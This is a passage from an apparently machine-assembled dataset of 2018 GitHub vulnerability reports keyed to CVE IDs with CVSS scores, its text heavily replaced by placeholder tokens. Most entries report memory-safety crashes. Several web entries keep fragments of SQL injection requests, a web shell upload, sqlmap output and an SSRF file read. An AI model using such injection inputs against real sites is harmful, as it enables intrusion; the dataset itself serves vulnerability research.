  22525. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22526. "severity": "MEDIUM",
  22527. "baseScore": 6.5,
  22528. "impactScore": 3.6,
  22529. "exploitabilityScore": 2.8
  22530. },
  22531. {
  22532. "CVE_ID": "CVE-2018-14436",
  22533. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1191",
  22534. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1191",
  22535. "Repo_new": "imagemagick/imagemagick",
  22536. "Issue_Created_At": "2018-07-04T03:04:58Z",
  22537. "description": "coders/miff.c colormap potential memory leak bug. Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description a potential memory leak bug is located in coders/miff.c Steps to Reproduce the bug is located in URLTAG the code fragment is as follows: the code is located in an if block, and we allocate colormap memory in the if block, we freed it in the normal branch\uff0cbut forgot to free it in the exception branch ERRORTAG credit: APITAG System Configuration APITAG",
  22538. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22539. "severity": "MEDIUM",
  22540. "baseScore": 6.5,
  22541. "impactScore": 3.6,
  22542. "exploitabilityScore": 2.8
  22543. },
  22544. {
  22545. "CVE_ID": "CVE-2018-14437",
  22546. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1190",
  22547. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1190",
  22548. "Repo_new": "imagemagick/imagemagick",
  22549. "Issue_Created_At": "2018-07-03T11:39:50Z",
  22550. "description": "memory leak bug in meta.c: APITAG function. Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description hello, I found a memory leak bug in imagemagick, the details are in the Steps to Reproduce. Steps to Reproduce the bug is located in meta.c ,static ssize_t APITAG ifile, Image ofile) function the bug code is on URLTAG the code fragment is as follows\uff1a CODETAG we can see that we allocate memory and assign it to line, but we forget to free it in the code: URLTAG the code is as follows: ERRORTAG APITAG APITAG",
  22551. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22552. "severity": "MEDIUM",
  22553. "baseScore": 6.5,
  22554. "impactScore": 3.6,
  22555. "exploitabilityScore": 2.8
  22556. },
  22557. {
  22558. "CVE_ID": "CVE-2018-14439",
  22559. "Issue_Url_old": "https://github.com/espritblock/eos4j/issues/6",
  22560. "Issue_Url_new": "https://github.com/espritblock/eos4j/issues/6",
  22561. "Repo_new": "espritblock/eos4j",
  22562. "Issue_Created_At": "2018-07-19T10:58:10Z",
  22563. "description": "\u8f6c\u8d26\u7cbe\u5ea6\u95ee\u9898. \u8f6c\u8d26\u65b9\u6cd5\u7684 asset \u5e8f\u5217\u5316\u65f6\uff0c\u628a amount NUMBERTAG APITAG EOS NUMBERTAG",
  22564. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  22565. "severity": "HIGH",
  22566. "baseScore": 7.5,
  22567. "impactScore": 3.6,
  22568. "exploitabilityScore": 3.9
  22569. },
  22570. {
  22571. "CVE_ID": "CVE-2018-14440",
  22572. "Issue_Url_old": "https://github.com/cckevincyh/CompanyWebsite/issues/3",
  22573. "Issue_Url_new": "https://github.com/cckevincyh/companywebsite/issues/3",
  22574. "Repo_new": "cckevincyh/companywebsite",
  22575. "Issue_Created_At": "2018-07-19T09:30:15Z",
  22576. "description": "\u8fd9\u6709\u4e2aSQL\u6ce8\u5165. POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Referer: URLTAG Cookie: APITAG DNT NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG APITAG and NUMBERTAG and '%'='",
  22577. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22578. "severity": "CRITICAL",
  22579. "baseScore": 9.8,
  22580. "impactScore": 5.9,
  22581. "exploitabilityScore": 3.9
  22582. },
  22583. {
  22584. "CVE_ID": "CVE-2018-14441",
  22585. "Issue_Url_old": "https://github.com/cckevincyh/CompanyWebsite/issues/4",
  22586. "Issue_Url_new": "https://github.com/cckevincyh/companywebsite/issues/4",
  22587. "Repo_new": "cckevincyh/companywebsite",
  22588. "Issue_Created_At": "2018-07-19T09:38:23Z",
  22589. "description": "\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e. POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Referer: URLTAG Cookie: APITAG DNT NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Content Disposition: form data; name=\"upload\"; APITAG Content Type: image/jpeg APITAG APITAG APITAG APITAG APITAG APITAG cmd APITAG APITAG APITAG APITAG APITAG APITAG NUMBERTAG",
  22590. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22591. "severity": "CRITICAL",
  22592. "baseScore": 9.8,
  22593. "impactScore": 5.9,
  22594. "exploitabilityScore": 3.9
  22595. },
  22596. {
  22597. "CVE_ID": "CVE-2018-14443",
  22598. "Issue_Url_old": "https://github.com/ArchimedesCAD/libredwg/issues/6",
  22599. "Issue_Url_new": "https://github.com/archimedescad/libredwg/issues/6",
  22600. "Repo_new": "archimedescad/libredwg",
  22601. "Issue_Created_At": "2018-07-19T12:19:58Z",
  22602. "description": "Invalid pointer dereference in libredwg. libredwg(crash) github address APITAG compile the test case in the source APITAG test with poc APITAG the gdb output ERRORTAG As you can see, the APITAG is now an illegal pointer, and we got a crash Program received signal SIGSEGV, Segmentation fault. By using asan, I found this is a heap overflow vulnerability the binary and the poc: ERRORTAG",
  22603. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22604. "severity": "MEDIUM",
  22605. "baseScore": 6.5,
  22606. "impactScore": 3.6,
  22607. "exploitabilityScore": 2.8
  22608. },
  22609. {
  22610. "CVE_ID": "CVE-2018-14445",
  22611. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/289",
  22612. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/289",
  22613. "Repo_new": "axiomatic-systems/bento4",
  22614. "Issue_Created_At": "2018-07-18T02:17:33Z",
  22615. "description": "ddos in APITAG When opening a crafted APITAG file, the program could enter APITAG , and it could hang, so the program could become unresponsive CODETAG The poc APITAG",
  22616. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22617. "severity": "MEDIUM",
  22618. "baseScore": 6.5,
  22619. "impactScore": 3.6,
  22620. "exploitabilityScore": 2.8
  22621. },
  22622. {
  22623. "CVE_ID": "CVE-2018-14446",
  22624. "Issue_Url_old": "https://github.com/TechSmith/mp4v2/issues/20",
  22625. "Issue_Url_new": "https://github.com/techsmith/mp4v2/issues/20",
  22626. "Repo_new": "techsmith/mp4v2",
  22627. "Issue_Created_At": "2018-07-18T02:56:44Z",
  22628. "description": "heap overflow in APITAG When opening a crafted APITAG file, the program could trigger a heap overflow, which could overwrite the vtable ptr, and then enter APITAG , use the vtable, and crash. The gdb output is below: ERRORTAG As you can see, the program crashes in APITAG ; now $rc NUMBERTAG deadbeef , which is under our control. fuzz log ERRORTAG",
  22629. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  22630. "severity": "HIGH",
  22631. "baseScore": 8.8,
  22632. "impactScore": 5.9,
  22633. "exploitabilityScore": 2.8
  22634. },
  22635. {
  22636. "CVE_ID": "CVE-2018-14447",
  22637. "Issue_Url_old": "https://github.com/martinh/libconfuse/issues/109",
  22638. "Issue_Url_new": "https://github.com/libconfuse/libconfuse/issues/109",
  22639. "Repo_new": "libconfuse/libconfuse",
  22640. "Issue_Created_At": "2018-07-18T08:48:53Z",
  22641. "description": "out of bound read in trim_whitespace. When opening a crafted file, the program could trigger an out of bound read ERRORTAG As you can see APITAG points to a APITAG size malloc chunk (whose size for the user is APITAG ), and APITAG is APITAG then APITAG could access NUMBERTAG byte out of the valid memory. the poc file APITAG",
  22642. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  22643. "severity": "HIGH",
  22644. "baseScore": 8.8,
  22645. "impactScore": 5.9,
  22646. "exploitabilityScore": 2.8
  22647. },
  22648. {
  22649. "CVE_ID": "CVE-2018-14448",
  22650. "Issue_Url_old": "https://github.com/ponchio/untrunc/issues/131",
  22651. "Issue_Url_new": "https://github.com/ponchio/untrunc/issues/131",
  22652. "Repo_new": "ponchio/untrunc",
  22653. "Issue_Created_At": "2018-07-19T00:20:04Z",
  22654. "description": "null pointer dereference in libav. When opening a crafted APITAG file, the program could hit a Segmentation fault ERRORTAG Now let's see in gdb ERRORTAG Crash at APITAG , the asm code is as below APITAG and APITAG , so null pointer dereference The vulnerability is in track.cpp CODETAG From the debug session , I find that the following line triggers the vulnerability APITAG stsd obj is a null pointer , let's see in APITAG ERRORTAG The function could return NULL , but APITAG doesn't consider it. To fix it , it may only be necessary to check the APITAG 's return value The poc file ERRORTAG",
  22655. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22656. "severity": "MEDIUM",
  22657. "baseScore": 6.5,
  22658. "impactScore": 3.6,
  22659. "exploitabilityScore": 2.8
  22660. },
  22661. {
  22662. "CVE_ID": "CVE-2018-14471",
  22663. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/32",
  22664. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/32",
  22665. "Repo_new": "libredwg/libredwg",
  22666. "Issue_Created_At": "2018-07-20T14:22:14Z",
  22667. "description": "null pointer dereference in APITAG When opening the crafted dwg file , it could trigger a null pointer dereference in APITAG Let's see the gdb output ERRORTAG As you can see , crash in APITAG and the null pointer dereference is NUMBERTAG so null pointer dereference . The Vulnerability is that APITAG in APITAG doesn't check the APITAG . ERRORTAG To fix it, please verify the ctrl >block_headers before using it. The poc file APITAG",
  22668. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22669. "severity": "MEDIUM",
  22670. "baseScore": 6.5,
  22671. "impactScore": 3.6,
  22672. "exploitabilityScore": 2.8
  22673. },
  22674. {
  22675. "CVE_ID": "CVE-2018-14472",
  22676. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/144",
  22677. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/144",
  22678. "Repo_new": "wuzhicms/wuzhicms",
  22679. "Issue_Created_At": "2018-07-20T13:30:12Z",
  22680. "description": "Wuzhicms NUMBERTAG PATHTAG have a SQL Injection Vulnerability. Vulnerability file APITAG CODETAG The APITAG parameter is taken directly into the execution of the get_one function without any filtering. POC APITAG FILETAG",
  22681. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  22682. "severity": "HIGH",
  22683. "baseScore": 7.2,
  22684. "impactScore": 5.9,
  22685. "exploitabilityScore": 1.2
  22686. },
  22687. {
  22688. "CVE_ID": "CVE-2018-14476",
  22689. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/88",
  22690. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/88",
  22691. "Repo_new": "semplon/genixcms",
  22692. "Issue_Created_At": "2017-11-23T11:19:21Z",
  22693. "description": "Advisory from Netsparker APITAG NUMBERTAG vulnerability . Hello, While testing the Netsparker web application security scanner we identified a vulnerability in APITAG NUMBERTAG Can you please advise whom we should contact to disclose the vulnerability details so it can be fixed? Please email me: daniel at netsparker dot com Looking forward to hearing from you. Regards, Daniel Bishtawi Marketing Administrator | Netsparker Web Application Security Scanner",
  22694. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22695. "severity": "MEDIUM",
  22696. "baseScore": 6.1,
  22697. "impactScore": 2.7,
  22698. "exploitabilityScore": 2.8
  22699. },
  22700. {
  22701. "CVE_ID": "CVE-2018-14498",
  22702. "Issue_Url_old": "https://github.com/mozilla/mozjpeg/issues/299",
  22703. "Issue_Url_new": "https://github.com/mozilla/mozjpeg/issues/299",
  22704. "Repo_new": "mozilla/mozjpeg",
  22705. "Issue_Created_At": "2018-07-20T04:57:53Z",
  22706. "description": "APITAG heap buffer overflow inside get NUMBERTAG bit_row (rdbmp.c). Our fuzzer detected several buffer overflow errors inside APITAG (lines NUMBERTAG and NUMBERTAG as of NUMBERTAG cba. These can be triggered with APITAG where $POC can be found in this directory URLTAG (files ending with APITAG ). Error messages are like: ERRORTAG",
  22707. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22708. "severity": "MEDIUM",
  22709. "baseScore": 6.5,
  22710. "impactScore": 3.6,
  22711. "exploitabilityScore": 2.8
  22712. },
  22713. {
  22714. "CVE_ID": "CVE-2018-14498",
  22715. "Issue_Url_old": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/258",
  22716. "Issue_Url_new": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/258",
  22717. "Repo_new": "libjpeg-turbo/libjpeg-turbo",
  22718. "Issue_Created_At": "2018-07-20T13:44:22Z",
  22719. "description": "APITAG heap buffer overflow inside get NUMBERTAG bit_row (rdbmp.c). APITAG was firstly mentioned in URLTAG and following APITAG suggestion I checked f4b8a5c and found similar issues; note that libjpeg did not trigger several crashes that mozjpeg triggered). It can be triggered with APITAG where $POC can be found in this directory URLTAG (files ending with .bmp). ASAN messages are like: ERRORTAG",
  22720. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22721. "severity": "MEDIUM",
  22722. "baseScore": 6.5,
  22723. "impactScore": 3.6,
  22724. "exploitabilityScore": 2.8
  22725. },
  22726. {
  22727. "CVE_ID": "CVE-2018-14499",
  22728. "Issue_Url_old": "https://github.com/hyyyp/HYBBS/issues/1",
  22729. "Issue_Url_new": "https://github.com/hyyyp/hybbs/issues/1",
  22730. "Repo_new": "hyyyp/HYBBS",
  22731. "Issue_Created_At": "2018-07-21T02:15:47Z",
  22732. "description": "Stored XSS was found in the title of the article. First I installed HYBBS and registered an account to test. Click the \"\u53d1\u8868\u65b0\u4e3b\u9898\". FILETAG Then at this page , I input ' APITAG ' at the title of an APITAG like this FILETAG At last, click \"\u53d1\u8868\". Then we can see the XSS has occurred",
  22733. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22734. "severity": "MEDIUM",
  22735. "baseScore": 6.1,
  22736. "impactScore": 2.7,
  22737. "exploitabilityScore": 2.8
  22738. },
  22739. {
  22740. "CVE_ID": "CVE-2018-14500",
  22741. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/431",
  22742. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/431",
  22743. "Repo_new": "joyplus/joyplus-cms",
  22744. "Issue_Created_At": "2018-07-19T02:13:47Z",
  22745. "description": "joyplus cms NUMBERTAG PATHTAG requests: GET PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Cookie: security_level NUMBERTAG APITAG adminid NUMBERTAG adminname=admin; APITAG APITAG X Forwarded For NUMBERTAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG FILETAG FILETAG",
  22746. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22747. "severity": "MEDIUM",
  22748. "baseScore": 6.1,
  22749. "impactScore": 2.7,
  22750. "exploitabilityScore": 2.8
  22751. },
  22752. {
  22753. "CVE_ID": "CVE-2018-14501",
  22754. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/432",
  22755. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/432",
  22756. "Repo_new": "joyplus/joyplus-cms",
  22757. "Issue_Created_At": "2018-07-19T02:35:22Z",
  22758. "description": "joyplus cms NUMBERTAG has Sql vulnerability. Request POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Accept Encoding: gzip, deflate Content Type: application/x www form urlencoded Content Length NUMBERTAG Referer: FILETAG Cookie: security_level NUMBERTAG APITAG adminid NUMBERTAG adminname=admin; APITAG APITAG X Forwarded For NUMBERTAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG Sqlmap: (custom) POST parameter APITAG like NUMBERTAG is vulnerable. Do you want to keep testing the others (if any)? FILETAG",
  22759. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22760. "severity": "CRITICAL",
  22761. "baseScore": 9.8,
  22762. "impactScore": 5.9,
  22763. "exploitabilityScore": 3.9
  22764. },
  22765. {
  22766. "CVE_ID": "CVE-2018-14505",
  22767. "Issue_Url_old": "https://github.com/mitmproxy/mitmproxy/issues/3234",
  22768. "Issue_Url_new": "https://github.com/mitmproxy/mitmproxy/issues/3234",
  22769. "Repo_new": "mitmproxy/mitmproxy",
  22770. "Issue_Created_At": "2018-07-01T15:58:07Z",
  22771. "description": "mitmweb isn't protected against DNS rebinding. The mitmweb interface does not seem to include protection against DNS rebinding. This could be exploited by a malicious website to either access the sniffed data or run arbitrary Python scripts on the filesystem by setting the scripts config option. I have hacked together a APITAG FILETAG (nothing really special to be seen though).",
  22772. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  22773. "severity": "HIGH",
  22774. "baseScore": 8.8,
  22775. "impactScore": 5.9,
  22776. "exploitabilityScore": 2.8
  22777. },
  22778. {
  22779. "CVE_ID": "CVE-2018-14512",
  22780. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/143",
  22781. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/143",
  22782. "Repo_new": "wuzhicms/wuzhicms",
  22783. "Issue_Created_At": "2018-07-20T07:35:18Z",
  22784. "description": "There is a XSS vulnerability. > A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a persistent XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the APITAG parameter posted to the APITAG When the administrator accesses the mail server system settings, the XSS vulnerability is triggered. POC CODETAG Vulnerability trigger point APITAG CODETAG APITAG APITAG APITAG",
  22785. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22786. "severity": "MEDIUM",
  22787. "baseScore": 6.1,
  22788. "impactScore": 2.7,
  22789. "exploitabilityScore": 2.8
  22790. },
  22791. {
  22792. "CVE_ID": "CVE-2018-14513",
  22793. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/145",
  22794. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/145",
  22795. "Repo_new": "wuzhicms/wuzhicms",
  22796. "Issue_Created_At": "2018-07-20T15:49:43Z",
  22797. "description": "wuzhicms NUMBERTAG SS vulnerability. > A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a persistent XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the APITAG parameter posted to the APITAG When the administrator accesses the mail server system settings, the XSS vulnerability is triggered. POC APITAG CODETAG vulnerability trigger point APITAG APITAG APITAG",
  22798. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22799. "severity": "MEDIUM",
  22800. "baseScore": 6.1,
  22801. "impactScore": 2.7,
  22802. "exploitabilityScore": 2.8
  22803. },
  22804. {
  22805. "CVE_ID": "CVE-2018-14514",
  22806. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/29",
  22807. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/29",
  22808. "Repo_new": "idreamsoft/iCMS",
  22809. "Issue_Created_At": "2018-07-21T10:20:18Z",
  22810. "description": "iCMS NUMBERTAG SSRF vulnerability GET SHELL. a SSRF vulnerability was discovered in iCMS NUMBERTAG There is a SSRF vulnerability that allows attackers to remotely construct malicious data to read sensitive server resource files, detect intranets, or even get a shell . via the APITAG attackers use this vulnerability to directly control the web service area. POC Loophole code APITAG Correct HTTP requests APITAG FILE protocol malware request APITAG APITAG APITAG APITAG APITAG APITAG",
  22811. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22812. "severity": "CRITICAL",
  22813. "baseScore": 9.8,
  22814. "impactScore": 5.9,
  22815. "exploitabilityScore": 3.9
  22816. },
  22817. {
  22818. "CVE_ID": "CVE-2018-14515",
  22819. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/146",
  22820. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/146",
  22821. "Repo_new": "wuzhicms/wuzhicms",
  22822. "Issue_Created_At": "2018-07-22T16:19:30Z",
  22823. "description": "wuzhicms NUMBERTAG sql injection vulnerability. > a sql injection was discovered in WUZHI CMS NUMBERTAG APITAG is a sql injection vulnerability which allows remote attackers to inject a malicious SQL statement into the server via the APITAG POC code that has loopholes APITAG ERRORTAG APITAG APITAG APITAG",
  22824. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22825. "severity": "CRITICAL",
  22826. "baseScore": 9.8,
  22827. "impactScore": 5.9,
  22828. "exploitabilityScore": 3.9
  22829. },
  22830. {
  22831. "CVE_ID": "CVE-2018-14522",
  22832. "Issue_Url_old": "https://github.com/aubio/aubio/issues/188",
  22833. "Issue_Url_new": "https://github.com/aubio/aubio/issues/188",
  22834. "Repo_new": "aubio/aubio",
  22835. "Issue_Created_At": "2018-07-22T11:50:21Z",
  22836. "description": "Another SEGV signal problem found. When I run the program aubionotes. The address sanitizer showed this: ERRORTAG The input file of the program has been displayed at: URLTAG The command line is just ./aubionotes testcase3",
  22837. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  22838. "severity": "HIGH",
  22839. "baseScore": 8.8,
  22840. "impactScore": 5.9,
  22841. "exploitabilityScore": 2.8
  22842. },
  22843. {
  22844. "CVE_ID": "CVE-2018-14523",
  22845. "Issue_Url_old": "https://github.com/aubio/aubio/issues/189",
  22846. "Issue_Url_new": "https://github.com/aubio/aubio/issues/189",
  22847. "Repo_new": "aubio/aubio",
  22848. "Issue_Created_At": "2018-07-22T11:52:12Z",
  22849. "description": "A global buffer overflow problem has been detected.. There is a global buffer overflow problem . Here are the details: ERRORTAG The input file has been displayed at : URLTAG The command line is just ./aubionotes testcase2",
  22850. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  22851. "severity": "HIGH",
  22852. "baseScore": 8.8,
  22853. "impactScore": 5.9,
  22854. "exploitabilityScore": 2.8
  22855. },
  22856. {
  22857. "CVE_ID": "CVE-2018-14524",
  22858. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/33",
  22859. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/33",
  22860. "Repo_new": "libredwg/libredwg",
  22861. "Issue_Created_At": "2018-07-20T23:26:33Z",
  22862. "description": "double free in dwg_free. When opening the crafted dwg file , it could trigger a double free in APITAG Let's see the program error output ERRORTAG And the output with asan ERRORTAG According to debugging , I found that when opening the crafted dwg file , APITAG could call APITAG , in APITAG first, it could call APITAG to free a pointer (for example : APITAG ) CODETAG The backtrace is as below CODETAG And then it could call APITAG again , it could call APITAG to free APITAG again. The backtrace is as below CODETAG The poc file APITAG",
  22863. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22864. "severity": "MEDIUM",
  22865. "baseScore": 6.5,
  22866. "impactScore": 3.6,
  22867. "exploitabilityScore": 2.8
  22868. },
  22869. {
  22870. "CVE_ID": "CVE-2018-14531",
  22871. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/293",
  22872. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/293",
  22873. "Repo_new": "axiomatic-systems/bento4",
  22874. "Issue_Created_At": "2018-07-22T08:57:37Z",
  22875. "description": "A heap buffer overflow has occurred when running program mp4info.. A heap buffer overflow has occurred when running program mp4info. ERRORTAG The testing program is mp4info. And the input file has been put at: FILETAG",
  22876. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22877. "severity": "CRITICAL",
  22878. "baseScore": 9.8,
  22879. "impactScore": 5.9,
  22880. "exploitabilityScore": 3.9
  22881. },
  22882. {
  22883. "CVE_ID": "CVE-2018-14532",
  22884. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/294",
  22885. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/294",
  22886. "Repo_new": "axiomatic-systems/bento4",
  22887. "Issue_Created_At": "2018-07-22T10:35:10Z",
  22888. "description": "A heap buffer overflow has occurred when running program mp NUMBERTAG hls.. A heap buffer overflow has occurred when running program mp NUMBERTAG hls. ERRORTAG The testing program is mp NUMBERTAG hls. And the input file has been put at: URLTAG",
  22889. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22890. "severity": "CRITICAL",
  22891. "baseScore": 9.8,
  22892. "impactScore": 5.9,
  22893. "exploitabilityScore": 3.9
  22894. },
  22895. {
  22896. "CVE_ID": "CVE-2018-14543",
  22897. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/292",
  22898. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/292",
  22899. "Repo_new": "axiomatic-systems/bento4",
  22900. "Issue_Created_At": "2018-07-20T09:19:47Z",
  22901. "description": "one null pointer deference bug in in APITAG in APITAG To reproduce: ./mp4dump format json $poc poc: FILETAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG e2b1f bp NUMBERTAG fff NUMBERTAG fa2cb0 sp NUMBERTAG fff NUMBERTAG fa2aa0 T NUMBERTAG e2b1e in APITAG const , unsigned char const , unsigned int, APITAG PATHTAG NUMBERTAG bc7 in APITAG PATHTAG NUMBERTAG d8b NUMBERTAG in APITAG PATHTAG NUMBERTAG ec in APITAG ) const PATHTAG NUMBERTAG f8b6 in APITAG const&) const PATHTAG NUMBERTAG f8b6 in APITAG PATHTAG NUMBERTAG d8b NUMBERTAG in APITAG PATHTAG NUMBERTAG f9e in main PATHTAG NUMBERTAG fc5c6b NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG e NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in APITAG const , unsigned char const , unsigned int, APITAG NUMBERTAG ABORTING",
  22902. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22903. "severity": "MEDIUM",
  22904. "baseScore": 5.5,
  22905. "impactScore": 3.6,
  22906. "exploitabilityScore": 1.8
  22907. },
  22908. {
  22909. "CVE_ID": "CVE-2018-14544",
  22910. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/291",
  22911. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/291",
  22912. "Repo_new": "axiomatic-systems/bento4",
  22913. "Issue_Created_At": "2018-07-20T03:13:14Z",
  22914. "description": "two null pointer deference in APITAG in when running mp NUMBERTAG ts . POC to trigger the two bugs. FILETAG NUMBERTAG mp NUMBERTAG ts poc1 FILETAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG e NUMBERTAG bp NUMBERTAG ffc NUMBERTAG da NUMBERTAG sp NUMBERTAG ffc NUMBERTAG da5e0 T NUMBERTAG e5f in APITAG const PATHTAG NUMBERTAG e5f in APITAG APITAG APITAG , bool, APITAG PATHTAG NUMBERTAG in APITAG APITAG , APITAG , APITAG , APITAG , APITAG , APITAG , unsigned int) PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fa NUMBERTAG bec NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG f8 in _start ( PATHTAG NUMBERTAG mp NUMBERTAG ts poc2 FILETAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG c (pc NUMBERTAG e NUMBERTAG bp NUMBERTAG ffed NUMBERTAG fc NUMBERTAG sp NUMBERTAG ffed NUMBERTAG fb NUMBERTAG T NUMBERTAG e NUMBERTAG in APITAG const PATHTAG NUMBERTAG e NUMBERTAG in 